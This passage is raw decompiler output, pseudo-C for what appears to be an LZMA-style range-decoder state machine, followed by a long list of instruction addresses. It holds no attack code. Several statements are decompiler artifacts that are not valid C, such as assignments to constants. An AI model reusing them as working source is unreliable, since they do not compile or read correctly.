                                                              							__eax =  *(__ebp - 0x28);
                                                              							goto L88;
                                                              						case 0xb:
                                                              							__eflags =  *(__ebp - 0x40);
                                                              							if( *(__ebp - 0x40) != 0) {
                                                              								__ecx =  *(__ebp - 0x24);
                                                              								__eax =  *(__ebp - 0x20);
                                                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                              							} else {
                                                              								__eax =  *(__ebp - 0x24);
                                                              							}
                                                              							__ecx =  *(__ebp - 0x28);
                                                              							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                              							L88:
                                                              							__ecx =  *(__ebp - 0x2c);
                                                              							 *(__ebp - 0x2c) = __eax;
                                                              							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                              							L89:
                                                              							__eax =  *(__ebp - 4);
                                                              							 *(__ebp - 0x80) = 0x15;
                                                              							__eax =  *(__ebp - 4) + 0xa68;
                                                              							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                              							goto L68;
                                                              						case 0xc:
                                                              							L99:
                                                              							__eflags =  *(__ebp - 0x6c);
                                                              							if( *(__ebp - 0x6c) == 0) {
                                                              								 *(__ebp - 0x88) = 0xc;
                                                              								goto L170;
                                                              							}
                                                              							__ecx =  *(__ebp - 0x70);
                                                              							__eax =  *(__ebp - 0xc);
                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							_t334 = __ebp - 0x70;
                                                              							 *_t334 =  *(__ebp - 0x70) + 1;
                                                              							__eflags =  *_t334;
                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							__eax =  *(__ebp - 0x2c);
                                                              							goto L101;
                                                              						case 0xd:
                                                              							goto L36;
                                                              						case 0xe:
                                                              							goto L45;
                                                              						case 0xf:
                                                              							goto L57;
                                                              						case 0x10:
                                                              							L109:
                                                              							__eflags =  *(__ebp - 0x6c);
                                                              							if( *(__ebp - 0x6c) == 0) {
                                                              								 *(__ebp - 0x88) = 0x10;
                                                              								goto L170;
                                                              							}
                                                              							__ecx =  *(__ebp - 0x70);
                                                              							__eax =  *(__ebp - 0xc);
                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							_t365 = __ebp - 0x70;
                                                              							 *_t365 =  *(__ebp - 0x70) + 1;
                                                              							__eflags =  *_t365;
                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							goto L111;
                                                              						case 0x11:
                                                              							L68:
                                                              							__esi =  *(__ebp - 0x58);
                                                              							 *(__ebp - 0x84) = 0x12;
                                                              							goto L132;
                                                              						case 0x12:
                                                              							__eflags =  *(__ebp - 0x40);
                                                              							if( *(__ebp - 0x40) != 0) {
                                                              								__eax =  *(__ebp - 0x58);
                                                              								 *(__ebp - 0x84) = 0x13;
                                                              								__esi =  *(__ebp - 0x58) + 2;
                                                              								goto L132;
                                                              							}
                                                              							__eax =  *(__ebp - 0x4c);
                                                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                              							__ecx =  *(__ebp - 0x58);
                                                              							__eax =  *(__ebp - 0x4c) << 4;
                                                              							__eflags = __eax;
                                                              							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                              							goto L130;
                                                              						case 0x13:
                                                              							__eflags =  *(__ebp - 0x40);
                                                              							if( *(__ebp - 0x40) != 0) {
                                                              								_t469 = __ebp - 0x58;
                                                              								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                              								__eflags =  *_t469;
                                                              								 *(__ebp - 0x30) = 0x10;
                                                              								 *(__ebp - 0x40) = 8;
                                                              								L144:
                                                              								 *(__ebp - 0x7c) = 0x14;
                                                              								goto L145;
                                                              							}
                                                              							__eax =  *(__ebp - 0x4c);
                                                              							__ecx =  *(__ebp - 0x58);
                                                              							__eax =  *(__ebp - 0x4c) << 4;
                                                              							 *(__ebp - 0x30) = 8;
                                                              							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                              							L130:
                                                              							 *(__ebp - 0x58) = __eax;
                                                              							 *(__ebp - 0x40) = 3;
                                                              							goto L144;
                                                              						case 0x14:
                                                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                              							__eax =  *(__ebp - 0x80);
                                                              							goto L140;
                                                              						case 0x15:
                                                              							__eax = 0;
                                                              							__eflags =  *(__ebp - 0x38) - 7;
                                                              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              							__al = __al & 0x000000fd;
                                                              							__eax = (__eflags >= 0) - 1 + 0xb;
                                                              							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                              							goto L120;
                                                              						case 0x16:
                                                              							__eax =  *(__ebp - 0x30);
                                                              							__eflags = __eax - 4;
                                                              							if(__eax >= 4) {
                                                              								_push(3);
                                                              								_pop(__eax);
                                                              							}
                                                              							__ecx =  *(__ebp - 4);
                                                              							 *(__ebp - 0x40) = 6;
                                                              							__eax = __eax << 7;
                                                              							 *(__ebp - 0x7c) = 0x19;
                                                              							 *(__ebp - 0x58) = __eax;
                                                              							goto L145;
                                                              						case 0x17:
                                                              							L145:
                                                              							__eax =  *(__ebp - 0x40);
                                                              							 *(__ebp - 0x50) = 1;
                                                              							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                              							goto L149;
                                                              						case 0x18:
                                                              							L146:
                                                              							__eflags =  *(__ebp - 0x6c);
                                                              							if( *(__ebp - 0x6c) == 0) {
                                                              								 *(__ebp - 0x88) = 0x18;
                                                              								goto L170;
                                                              							}
                                                              							__ecx =  *(__ebp - 0x70);
                                                              							__eax =  *(__ebp - 0xc);
                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							_t484 = __ebp - 0x70;
                                                              							 *_t484 =  *(__ebp - 0x70) + 1;
                                                              							__eflags =  *_t484;
                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              							L148:
                                                              							_t487 = __ebp - 0x48;
                                                              							 *_t487 =  *(__ebp - 0x48) - 1;
                                                              							__eflags =  *_t487;
                                                              							L149:
                                                              							__eflags =  *(__ebp - 0x48);
                                                              							if( *(__ebp - 0x48) <= 0) {
                                                              								__ecx =  *(__ebp - 0x40);
                                                              								__ebx =  *(__ebp - 0x50);
                                                              								0 = 1;
                                                              								__eax = 1 << __cl;
                                                              								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                              								__eax =  *(__ebp - 0x7c);
                                                              								 *(__ebp - 0x44) = __ebx;
                                                              								goto L140;
                                                              							}
                                                              							__eax =  *(__ebp - 0x50);
                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                              							__eax =  *(__ebp - 0x58);
                                                              							__esi = __edx + __eax;
                                                              							 *(__ebp - 0x54) = __esi;
                                                              							__ax =  *__esi;
                                                              							__edi = __ax & 0x0000ffff;
                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              							__eflags =  *(__ebp - 0xc) - __ecx;
                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              								__cx = __ax;
                                                              								__cx = __ax >> 5;
                                                              								__eax = __eax - __ecx;
                                                              								__edx = __edx + 1;
                                                              								__eflags = __edx;
                                                              								 *__esi = __ax;
                                                              								 *(__ebp - 0x50) = __edx;
                                                              							} else {
                                                              								 *(__ebp - 0x10) = __ecx;
                                                              								0x800 = 0x800 - __edi;
                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                              								 *__esi = __cx;
                                                              							}
                                                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                              								goto L148;
                                                              							} else {
                                                              								goto L146;
                                                              							}
                                                              						case 0x19:
                                                              							__eflags = __ebx - 4;
                                                              							if(__ebx < 4) {
                                                              								 *(__ebp - 0x2c) = __ebx;
                                                              								L119:
                                                              								_t393 = __ebp - 0x2c;
                                                              								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                              								__eflags =  *_t393;
                                                              								L120:
                                                              								__eax =  *(__ebp - 0x2c);
                                                              								__eflags = __eax;
                                                              								if(__eax == 0) {
                                                              									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                              									goto L170;
                                                              								}
                                                              								__eflags = __eax -  *(__ebp - 0x60);
                                                              								if(__eax >  *(__ebp - 0x60)) {
                                                              									goto L171;
                                                              								}
                                                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                              								__eax =  *(__ebp - 0x30);
                                                              								_t400 = __ebp - 0x60;
                                                              								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                              								__eflags =  *_t400;
                                                              								goto L123;
                                                              							}
                                                              							__ecx = __ebx;
                                                              							__eax = __ebx;
                                                              							__ecx = __ebx >> 1;
                                                              							__eax = __ebx & 0x00000001;
                                                              							__ecx = (__ebx >> 1) - 1;
                                                              							__al = __al | 0x00000002;
                                                              							__eax = (__ebx & 0x00000001) << __cl;
                                                              							__eflags = __ebx - 0xe;
                                                              							 *(__ebp - 0x2c) = __eax;
                                                              							if(__ebx >= 0xe) {
                                                              								__ebx = 0;
                                                              								 *(__ebp - 0x48) = __ecx;
                                                              								L102:
                                                              								__eflags =  *(__ebp - 0x48);
                                                              								if( *(__ebp - 0x48) <= 0) {
                                                              									__eax = __eax + __ebx;
                                                              									 *(__ebp - 0x40) = 4;
                                                              									 *(__ebp - 0x2c) = __eax;
                                                              									__eax =  *(__ebp - 4);
                                                              									__eax =  *(__ebp - 4) + 0x644;
                                                              									__eflags = __eax;
                                                              									L108:
                                                              									__ebx = 0;
                                                              									 *(__ebp - 0x58) = __eax;
                                                              									 *(__ebp - 0x50) = 1;
                                                              									 *(__ebp - 0x44) = 0;
                                                              									 *(__ebp - 0x48) = 0;
                                                              									L112:
                                                              									__eax =  *(__ebp - 0x40);
                                                              									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                              									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                              										_t391 = __ebp - 0x2c;
                                                              										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                              										__eflags =  *_t391;
                                                              										goto L119;
                                                              									}
                                                              									__eax =  *(__ebp - 0x50);
                                                              									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                              									__eax =  *(__ebp - 0x58);
                                                              									__esi = __edi + __eax;
                                                              									 *(__ebp - 0x54) = __esi;
                                                              									__ax =  *__esi;
                                                              									__ecx = __ax & 0x0000ffff;
                                                              									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                              									__eflags =  *(__ebp - 0xc) - __edx;
                                                              									if( *(__ebp - 0xc) >= __edx) {
                                                              										__ecx = 0;
                                                              										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                              										__ecx = 1;
                                                              										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                              										__ebx = 1;
                                                              										__ecx =  *(__ebp - 0x48);
                                                              										__ebx = 1 << __cl;
                                                              										__ecx = 1 << __cl;
                                                              										__ebx =  *(__ebp - 0x44);
                                                              										__ebx =  *(__ebp - 0x44) | __ecx;
                                                              										__cx = __ax;
                                                              										__cx = __ax >> 5;
                                                              										__eax = __eax - __ecx;
                                                              										__edi = __edi + 1;
                                                              										__eflags = __edi;
                                                              										 *(__ebp - 0x44) = __ebx;
                                                              										 *__esi = __ax;
                                                              										 *(__ebp - 0x50) = __edi;
                                                              									} else {
                                                              										 *(__ebp - 0x10) = __edx;
                                                              										0x800 = 0x800 - __ecx;
                                                              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                              										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                              										 *__esi = __dx;
                                                              									}
                                                              									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              									if( *(__ebp - 0x10) >= 0x1000000) {
                                                              										L111:
                                                              										_t368 = __ebp - 0x48;
                                                              										 *_t368 =  *(__ebp - 0x48) + 1;
                                                              										__eflags =  *_t368;
                                                              										goto L112;
                                                              									} else {
                                                              										goto L109;
                                                              									}
                                                              								}
                                                              								__ecx =  *(__ebp - 0xc);
                                                              								__ebx = __ebx + __ebx;
                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                              								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                              								 *(__ebp - 0x44) = __ebx;
                                                              								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                              									__ecx =  *(__ebp - 0x10);
                                                              									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                              									__ebx = __ebx | 0x00000001;
                                                              									__eflags = __ebx;
                                                              									 *(__ebp - 0x44) = __ebx;
                                                              								}
                                                              								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              								if( *(__ebp - 0x10) >= 0x1000000) {
                                                              									L101:
                                                              									_t338 = __ebp - 0x48;
                                                              									 *_t338 =  *(__ebp - 0x48) - 1;
                                                              									__eflags =  *_t338;
                                                              									goto L102;
                                                              								} else {
                                                              									goto L99;
                                                              								}
                                                              							}
                                                              							__edx =  *(__ebp - 4);
                                                              							__eax = __eax - __ebx;
                                                              							 *(__ebp - 0x40) = __ecx;
                                                              							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                              							goto L108;
                                                              						case 0x1a:
                                                              							goto L55;
                                                              						case 0x1b:
                                                              							L75:
                                                              							__eflags =  *(__ebp - 0x64);
                                                              							if( *(__ebp - 0x64) == 0) {
                                                              								 *(__ebp - 0x88) = 0x1b;
                                                              								goto L170;
                                                              							}
                                                              							__eax =  *(__ebp - 0x14);
                                                              							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              							__eflags = __eax -  *(__ebp - 0x74);
                                                              							if(__eax >=  *(__ebp - 0x74)) {
                                                              								__eax = __eax +  *(__ebp - 0x74);
                                                              								__eflags = __eax;
                                                              							}
                                                              							__edx =  *(__ebp - 8);
                                                              							__cl =  *(__eax + __edx);
                                                              							__eax =  *(__ebp - 0x14);
                                                              							 *(__ebp - 0x5c) = __cl;
                                                              							 *(__eax + __edx) = __cl;
                                                              							__eax = __eax + 1;
                                                              							__edx = 0;
                                                              							_t274 = __eax %  *(__ebp - 0x74);
                                                              							__eax = __eax /  *(__ebp - 0x74);
                                                              							__edx = _t274;
                                                              							__eax =  *(__ebp - 0x68);
                                                              							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                              							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              							_t283 = __ebp - 0x64;
                                                              							 *_t283 =  *(__ebp - 0x64) - 1;
                                                              							__eflags =  *_t283;
                                                              							 *( *(__ebp - 0x68)) = __cl;
                                                              							goto L79;
                                                              						case 0x1c:
                                                              							while(1) {
                                                              								L123:
                                                              								__eflags =  *(__ebp - 0x64);
                                                              								if( *(__ebp - 0x64) == 0) {
                                                              									break;
                                                              								}
                                                              								__eax =  *(__ebp - 0x14);
                                                              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              								__eflags = __eax -  *(__ebp - 0x74);
                                                              								if(__eax >=  *(__ebp - 0x74)) {
                                                              									__eax = __eax +  *(__ebp - 0x74);
                                                              									__eflags = __eax;
                                                              								}
                                                              								__edx =  *(__ebp - 8);
                                                              								__cl =  *(__eax + __edx);
                                                              								__eax =  *(__ebp - 0x14);
                                                              								 *(__ebp - 0x5c) = __cl;
                                                              								 *(__eax + __edx) = __cl;
                                                              								__eax = __eax + 1;
                                                              								__edx = 0;
                                                              								_t414 = __eax %  *(__ebp - 0x74);
                                                              								__eax = __eax /  *(__ebp - 0x74);
                                                              								__edx = _t414;
                                                              								__eax =  *(__ebp - 0x68);
                                                              								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                              								__eflags =  *(__ebp - 0x30);
                                                              								 *( *(__ebp - 0x68)) = __cl;
                                                              								 *(__ebp - 0x14) = __edx;
                                                              								if( *(__ebp - 0x30) > 0) {
                                                              									continue;
                                                              								} else {
                                                              									goto L80;
                                                              								}
                                                              							}
                                                              							 *(__ebp - 0x88) = 0x1c;
                                                              							goto L170;
                                                              					}
                                                              				}
                                                              			}













                                                              0x00000000
                                                              0x00406d5f
                                                              0x00406d5f
                                                              0x00406d64
                                                              0x00406ddb
                                                              0x00406de2
                                                              0x00406dec
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x0040741a
                                                              0x00407441
                                                              0x00407441
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x0040741c
                                                              0x0040741c
                                                              0x00407420
                                                              0x004075cf
                                                              0x00000000
                                                              0x004075cf
                                                              0x0040742c
                                                              0x00407433
                                                              0x0040743b
                                                              0x0040743e
                                                              0x00000000
                                                              0x0040743e
                                                              0x00406d66
                                                              0x00406d66
                                                              0x00406d6a
                                                              0x00406d72
                                                              0x00406d75
                                                              0x00406d77
                                                              0x00406d7a
                                                              0x00406d7c
                                                              0x00406d81
                                                              0x00406d84
                                                              0x00406d8b
                                                              0x00406d92
                                                              0x00406d95
                                                              0x00406da0
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406daf
                                                              0x00406dcd
                                                              0x00406dcf
                                                              0x00406fa2
                                                              0x00406fa2
                                                              0x00406fa5
                                                              0x00406fa8
                                                              0x00406fab
                                                              0x00406fae
                                                              0x00406fb1
                                                              0x00406fb4
                                                              0x00406fb7
                                                              0x00406fba
                                                              0x00406fc0
                                                              0x00406fd8
                                                              0x00406fdb
                                                              0x00406fde
                                                              0x00406fe1
                                                              0x00406fe1
                                                              0x00406fe4
                                                              0x00406fea
                                                              0x00406fc2
                                                              0x00406fc2
                                                              0x00406fca
                                                              0x00406fcf
                                                              0x00406fd1
                                                              0x00406fd3
                                                              0x00406fd3
                                                              0x00406ff4
                                                              0x00406ff7
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00406f75
                                                              0x00406f79
                                                              0x00407581
                                                              0x00000000
                                                              0x00407581
                                                              0x00406f7f
                                                              0x00406f82
                                                              0x00406f85
                                                              0x00406f89
                                                              0x00406f8c
                                                              0x00406f92
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f97
                                                              0x00000000
                                                              0x00406f97
                                                              0x00406db1
                                                              0x00406db1
                                                              0x00406db4
                                                              0x00406dba
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbf
                                                              0x00406dc2
                                                              0x00406dc4
                                                              0x00406dc5
                                                              0x00406dc8
                                                              0x00406e35
                                                              0x00406e35
                                                              0x00406e39
                                                              0x00406e3c
                                                              0x00406e3f
                                                              0x00406e42
                                                              0x00406e45
                                                              0x00406e46
                                                              0x00406e49
                                                              0x00406e4b
                                                              0x00406e51
                                                              0x00406e54
                                                              0x00406e57
                                                              0x00406e5a
                                                              0x00406e5d
                                                              0x00406e63
                                                              0x00406e7f
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8f
                                                              0x00406e95
                                                              0x00406e99
                                                              0x00406e65
                                                              0x00406e65
                                                              0x00406e69
                                                              0x00406e71
                                                              0x00406e76
                                                              0x00406e78
                                                              0x00406e7a
                                                              0x00406e7a
                                                              0x00406ea3
                                                              0x00406ea6
                                                              0x00406e1d
                                                              0x00406e1d
                                                              0x00406e23
                                                              0x00406ed6
                                                              0x00406edc
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ede
                                                              0x00406ee1
                                                              0x00406ee4
                                                              0x00406ee7
                                                              0x00406eea
                                                              0x00406eed
                                                              0x00406ef0
                                                              0x00406ef3
                                                              0x00406ef6
                                                              0x00406efc
                                                              0x00406f14
                                                              0x00406f17
                                                              0x00406f1a
                                                              0x00406f1d
                                                              0x00406f1d
                                                              0x00406f20
                                                              0x00406f26
                                                              0x00406efe
                                                              0x00406efe
                                                              0x00406f06
                                                              0x00406f0b
                                                              0x00406f0d
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00406eb1
                                                              0x00406eb5
                                                              0x00407575
                                                              0x00000000
                                                              0x00407575
                                                              0x00406ebb
                                                              0x00406ebe
                                                              0x00406ec1
                                                              0x00406ec5
                                                              0x00406ec8
                                                              0x00406ece
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed3
                                                              0x00406ed3
                                                              0x00406f33
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3e
                                                              0x00406f3e
                                                              0x00406f41
                                                              0x00406f44
                                                              0x00406f48
                                                              0x0040758d
                                                              0x00000000
                                                              0x0040758d
                                                              0x00406f4e
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00406f57
                                                              0x00406f5a
                                                              0x00406f5d
                                                              0x00406f60
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x0040710a
                                                              0x0040710a
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00000000
                                                              0x0040710d
                                                              0x00406e2f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406eac
                                                              0x00406df8
                                                              0x00406dfc
                                                              0x00407569
                                                              0x004075e5
                                                              0x004075ed
                                                              0x004075f4
                                                              0x004075f6
                                                              0x004075fd
                                                              0x00407601
                                                              0x00407601
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0c
                                                              0x00406e0f
                                                              0x00406e15
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e1a
                                                              0x00000000
                                                              0x00406e1a
                                                              0x00406ea6
                                                              0x00406daf
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406bec
                                                              0x004075fa
                                                              0x004075fa
                                                              0x00000000
                                                              0x004075fa
                                                              0x00406bf2
                                                              0x00000000
                                                              0x00406bfd
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c06
                                                              0x00406c09
                                                              0x00406c0c
                                                              0x00406c10
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c16
                                                              0x00406c19
                                                              0x00406c1b
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406c21
                                                              0x00406c22
                                                              0x00406c24
                                                              0x00406c27
                                                              0x00406c2c
                                                              0x00406c31
                                                              0x00406c3a
                                                              0x00406c4d
                                                              0x00406c50
                                                              0x00406c5c
                                                              0x00406c84
                                                              0x00406c86
                                                              0x00406c94
                                                              0x00406c94
                                                              0x00406c98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c88
                                                              0x00406c8b
                                                              0x00406c8c
                                                              0x00406c8c
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c62
                                                              0x00406c67
                                                              0x00406c67
                                                              0x00406c70
                                                              0x00406c78
                                                              0x00406c7b
                                                              0x00000000
                                                              0x00406c81
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c9e
                                                              0x00406c9e
                                                              0x00406ca2
                                                              0x0040754e
                                                              0x00000000
                                                              0x0040754e
                                                              0x00406cab
                                                              0x00406cbb
                                                              0x00406cbe
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc4
                                                              0x00406cc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406cca
                                                              0x00406cd0
                                                              0x00406cfa
                                                              0x00406d00
                                                              0x00406d07
                                                              0x00000000
                                                              0x00406d07
                                                              0x00406cd6
                                                              0x00406cd9
                                                              0x00406cde
                                                              0x00406cde
                                                              0x00406ce9
                                                              0x00406cf1
                                                              0x00406cf4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d39
                                                              0x00406d3f
                                                              0x00406d42
                                                              0x00406d4f
                                                              0x00406d57
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d0e
                                                              0x00406d0e
                                                              0x00406d12
                                                              0x0040755d
                                                              0x00000000
                                                              0x0040755d
                                                              0x00406d1e
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d32
                                                              0x00406d37
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ffe
                                                              0x00407002
                                                              0x00407020
                                                              0x00407023
                                                              0x0040702a
                                                              0x0040702d
                                                              0x00407030
                                                              0x00407033
                                                              0x00407036
                                                              0x00407039
                                                              0x0040703b
                                                              0x00407042
                                                              0x00407043
                                                              0x00407045
                                                              0x00407048
                                                              0x0040704b
                                                              0x0040704e
                                                              0x0040704e
                                                              0x00407053
                                                              0x00000000
                                                              0x00407053
                                                              0x00407004
                                                              0x00407007
                                                              0x0040700a
                                                              0x00407014
                                                              0x00000000
                                                              0x00000000
                                                              0x00407068
                                                              0x0040706c
                                                              0x0040708f
                                                              0x00407092
                                                              0x00407095
                                                              0x0040709f
                                                              0x0040706e
                                                              0x0040706e
                                                              0x00407071
                                                              0x00407074
                                                              0x00407077
                                                              0x00407084
                                                              0x00407087
                                                              0x00407087
                                                              0x00000000
                                                              0x00000000
                                                              0x004070ab
                                                              0x004070af
                                                              0x00000000
                                                              0x00000000
                                                              0x004070b5
                                                              0x004070b9
                                                              0x00000000
                                                              0x00000000
                                                              0x004070bf
                                                              0x004070c1
                                                              0x004070c5
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070cc
                                                              0x00000000
                                                              0x00000000
                                                              0x0040711c
                                                              0x00407120
                                                              0x00407127
                                                              0x0040712a
                                                              0x0040712d
                                                              0x00407137
                                                              0x00000000
                                                              0x00407137
                                                              0x00407122
                                                              0x00000000
                                                              0x00000000
                                                              0x00407143
                                                              0x00407147
                                                              0x0040714e
                                                              0x00407151
                                                              0x00407154
                                                              0x00407149
                                                              0x00407149
                                                              0x00407149
                                                              0x00407157
                                                              0x0040715a
                                                              0x0040715d
                                                              0x0040715d
                                                              0x00407160
                                                              0x00407163
                                                              0x00407166
                                                              0x00407166
                                                              0x00407169
                                                              0x00407170
                                                              0x00407175
                                                              0x00000000
                                                              0x00000000
                                                              0x00407203
                                                              0x00407203
                                                              0x00407207
                                                              0x004075a5
                                                              0x00000000
                                                              0x004075a5
                                                              0x0040720d
                                                              0x00407210
                                                              0x00407213
                                                              0x00407217
                                                              0x0040721a
                                                              0x00407220
                                                              0x00407222
                                                              0x00407222
                                                              0x00407222
                                                              0x00407225
                                                              0x00407228
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407286
                                                              0x00407286
                                                              0x0040728a
                                                              0x004075b1
                                                              0x00000000
                                                              0x004075b1
                                                              0x00407290
                                                              0x00407293
                                                              0x00407296
                                                              0x0040729a
                                                              0x0040729d
                                                              0x004072a3
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x00000000
                                                              0x00000000
                                                              0x00407395
                                                              0x00407399
                                                              0x004073bb
                                                              0x004073be
                                                              0x004073c8
                                                              0x00000000
                                                              0x004073c8
                                                              0x0040739b
                                                              0x0040739e
                                                              0x004073a2
                                                              0x004073a5
                                                              0x004073a5
                                                              0x004073a8
